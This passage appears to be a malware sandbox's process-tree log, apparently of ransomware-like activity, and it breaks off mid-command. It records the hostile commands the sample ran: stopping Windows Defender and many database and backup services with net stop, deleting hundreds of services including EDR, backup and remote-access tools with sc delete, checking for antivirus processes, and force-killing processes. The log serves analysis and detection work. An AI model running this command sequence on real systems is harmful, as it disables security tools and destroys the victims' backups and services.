C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SQLWriter | depth 4
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "Synology Drive VSS Service x64" | depth 5
C:\Windows\SysWOW64\net.exe | net stop WinDefend | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop WinDefend | depth 4
C:\Windows\SysWOW64\net.exe | net stop mr2kserv | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop mr2kserv | depth 4
C:\Windows\SysWOW64\net.exe | net stop MSExchangeADTopology | depth 3
C: \Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop MSExchangeADTopology | depth 4
C:\Windows\SysWOW64\net.exe | net stop MSExchangeFBA | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop MSExchangeFBA | depth 4
C:\Windows\SysWOW64\net.exe | net stop MSExchangeIS | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop MSExchangeIS | depth 4
C:\Windows\SysWOW64\net.exe | net stop MSExchangeSA | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop MSExchangeSA | depth 4
C:\Windows\SysWOW64\net.exe | net stop ShadowProtectSvc | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop ShadowProtectSvc | depth 4
C:\Windows\SysWOW64\net.exe | net stop SPAdminV4 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SPAdminV4 | depth 4
C:\Windows\SysWOW64\net.exe | net stop SPTimerV4 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SPTimerV4 | depth 4
C:\Windows\SysWOW64\net.exe | net stop SPTraceV4 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SPTraceV4 | depth 4
C:\Windows\SysWOW64\net.exe | net stop SPUserCodeV4 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SPUserCodeV4 | depth 4
C:\Windows\SysWOW64\net.exe | net stop SPWriterV4 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SPWriterV4 | depth 4
C:\Windows\SysWOW64\net.exe | net stop SPSearch4 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SPSearch4 | depth 4
C:\Windows\SysWOW64\net.exe | net stop MSSQLServerADHelper100 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop MSSQLServerADHelper100 | depth 4
C:\Windows\SysWOW64\net.exe | net stop IISADMIN | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop IISADMIN | depth 4
C:\Windows\SysWOW64\net.exe | net stop firebirdguardiandefaultinstance | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop firebirdguardiandefaultinstance | depth 4
C:\Windows\SysWOW64\net.exe | net stop ibmiasrw | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop ibmiasrw | depth 4
C:\Windows\SysWOW64\net.exe | net stop QBCFMonitorService | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop QBCFMonitorService | depth 4
C:\Windows\SysWOW64\net.exe | net stop QBVSS | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop QBVSS | depth 4
C:\Windows\SysWOW64\net.exe | net stop QBPOSDBServiceV12 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop QBPOSDBServiceV12 | depth 4
C:\Windows\SysWOW64\net.exe | net stop "IBM Domino Server (CProgramFilesIBMDominodata)" | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)" | depth 4
C:\Windows\SysWOW64\net.exe | net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)" | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)" | depth 4
C:\Windows\SysWOW64\net.exe | net stop IISADMIN | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop IISADMIN | depth 4
C:\Windows\SysWOW64\net.exe | net stop "Simply Accounting Database Connection Manager" | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager" | depth 4
C:\Windows\SysWOW64\net.exe | net stop QuickBooksDB1 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop QuickBooksDB1 | depth 4
C:\Windows\SysWOW64\net.exe | net stop QuickBooksDB2 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop QuickBooksDB2 | depth 4
C:\Windows\SysWOW64\net.exe | net stop QuickBooksDB3 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop QuickBooksDB3 | depth 4
C:\Windows\SysWOW64\net.exe | net stop QuickBooksDB4 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop QuickBooksDB4 | depth 4
C:\Windows\SysWOW64\net.exe | net stop QuickBooksDB5 | depth 3
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB54⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im UniFi.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq MsMpEng.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq ntrtscan.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq avp.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq WRSA.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq egui.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq AvastUI.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""3⤵
- C:\Windows\SysWOW64\sc.exe | sc delete "XT800Service_Personal" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SQLWriter | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SQLSERVERAGENT | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SQLBrowser | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete MSSQLFDLauncher | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MSSQLSERVER | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete QcSoftService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MSSQLServerOLAPService | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete VMTools | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete VGAuthService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MSDTC | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete TeamViewer | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ReportServer | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete RabbitMQ | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "AHS SERVICE" | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete "Sense Shield Service" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SSMonitorService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete TPlusStdAppService1300 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SQLAgent$SQL2008 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MSSQL$SQL2008 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete TPlusStdTaskService1300 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete TPlusStdUpgradeService1300 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete VirboxWebServer | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete jhi_service | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete LMS | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "FontCache3.0.0.0" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "OSP Service" | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete SSSyncService | depth 4
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"3⤵
- C:\Windows\SysWOW64\sc.exe | sc delete "DAService_TCP" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "eCard-TTransServer" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete eCardMPService | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete EnergyDataService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete UI0Detect | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete K3MobileService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete TCPIDDAService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete WebAttendServer | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete UIODetect | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "wanxiao-monitor" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete VMAuthdService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete VMUSBArbService | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete VMwareHostd | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "vm-agent" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete OpenSSHd | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete eSightService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete apachezt | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete Jenkins | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete secbizsrv | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SQLTELEMETRY | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete smtpsvrJT | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete zyb_sync | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete 360EntHttpServer | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete 360EntSvc | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete NFWebServer | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete wampapache | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete MSSEARCH | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete msftesql | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete 360EntClientSvc | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MSMQ | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "SyncBASE Service" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete OracleJobSchedulerORCL | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete OracleMTSRecoveryService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete OracleDBConcoleorcl | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete VmAgentDaemon | depth 4
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""3⤵
- C:\Windows\SysWOW64\sc.exe | sc delete OracleOraDb11g_home1ClrAgent | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete OracleOraDb11g_home1TNSListener | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete OracleVssWriterORCL | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete OracleServiceORCL | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete aspnet_state @sc delete Redis | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete OracleVssWriterORCL | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete JhTask | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete ImeDictUpdateService | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete XT800Service_Personal | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MCService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ImeDictUpdateService | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete allpass_redisservice_port21160 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "Flash Helper Service" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "Kiwi Syslog Server" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "UWS HiPriv Services" | depth 4
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"3⤵
- C:\Windows\SysWOW64\sc.exe | sc delete "UWS LoPriv Services" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ftnlsv3 | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete ftnlses3 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete FxService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "UtilDev Web Server Pro" | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete ftusbrdwks | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ftusbrdsrv | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "ZTE USBIP Client Guard" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "ZTE USBIP Client" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "ZTE FileTranS" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete wwbizsrv | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete qemu-ga | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete AlibabaProtect | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete kbasesrv | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MMRHookService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete OracleJobSchedulerORCL | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete KuaiYunTools | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete KMSELDI | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete btPanel | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete Protect_2345Explorer | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete 2345PicSvc | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete vmware-converter-agent | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete vmware-converter-server | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete vmware-converter-worker | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete QQCertificateService | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete OracleRemExecService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete GPSDaemon | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete GPSUserSvr | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete GPSDownSvr | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete GPSStorageSvr | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete GPSDataProcSvr | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete GPSGatewaySvr | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete GPSMediaSvr | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete GPSLoginSvr | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete GPSTomcat6 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete GPSMysqld | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete GPSFtpd | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MsDtsServer100 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete IpOverUsbSvc | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ZTEVdservice | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete "Zabbix Agent" | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete BackupExecAgentAccelerator | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete bedbg | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete BackupExecDeviceMediaService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete BackupExecRPCService | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete BackupExecAgentBrowser | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete BackupExecJobEngine | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete BackupExecManagementService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MDM | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete TxQBService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete Gailun_Downloader | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete RemoteAssistService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete YunService | depth 4
  - Launches sc.exe
C:\Windows\SysWOW64\cmd.execmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete 
UTUService & @sc delete "U8WorkerService1""3⤵
- C:\Windows\SysWOW64\sc.exe | sc delete MSCRMAsyncService | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete REPLICA | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete RTCATS | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete RTCAVMCU | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete RtcQms | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete RTCMEETINGMCU | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete RTCIMMCU | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete RTCDATAMCU | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete RTCCDR | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ProjectEventService16 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ProjectQueueService16 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SPAdminV4 | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete SPSearchHostController | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SPTimerV4 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SPTraceV4 | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete c2wts | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ADWS | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MotionBoard57 | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete MotionBoardRCService57 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete vsvnjobsvc | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete VisualSVNServer | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete BestSyncSvc | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete LPManager | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MediatekRegistryWriter | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete RaAutoInstSrv_RT2870 | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete "FlexNet Licensing Service 64" | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete CobianBackup10 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SQLANYs_sem5 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete CASLicenceServer | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete SQLService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete semwebsrv | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete TbossSystem | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete AppFabricCachingService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ProjectCalcService16 | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete ErpEnvSvc | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete OSearch16 | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete Mysoft.Autoupgrade.DispatchService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete Mysoft.Autoupgrade.UpdateService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete Mysoft.Config.WindowsService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete Mysoft.DataCenterService | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete Mysoft.SchedulingService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete Mysoft.Setup.InstallService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete MysoftUpdate | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete edr_monitor | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete abs_deployer | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete savsvc | depth 4
  - Launches sc.exe
- C:\Windows\SysWOW64\sc.exe | sc delete ShareBoxMonitorService | depth 4
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\sc.exe | sc delete ShareBoxService | depth 4
- C:\Windows\SysWOW64\sc.exe | sc delete CloudExchangeService | depth 4
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM 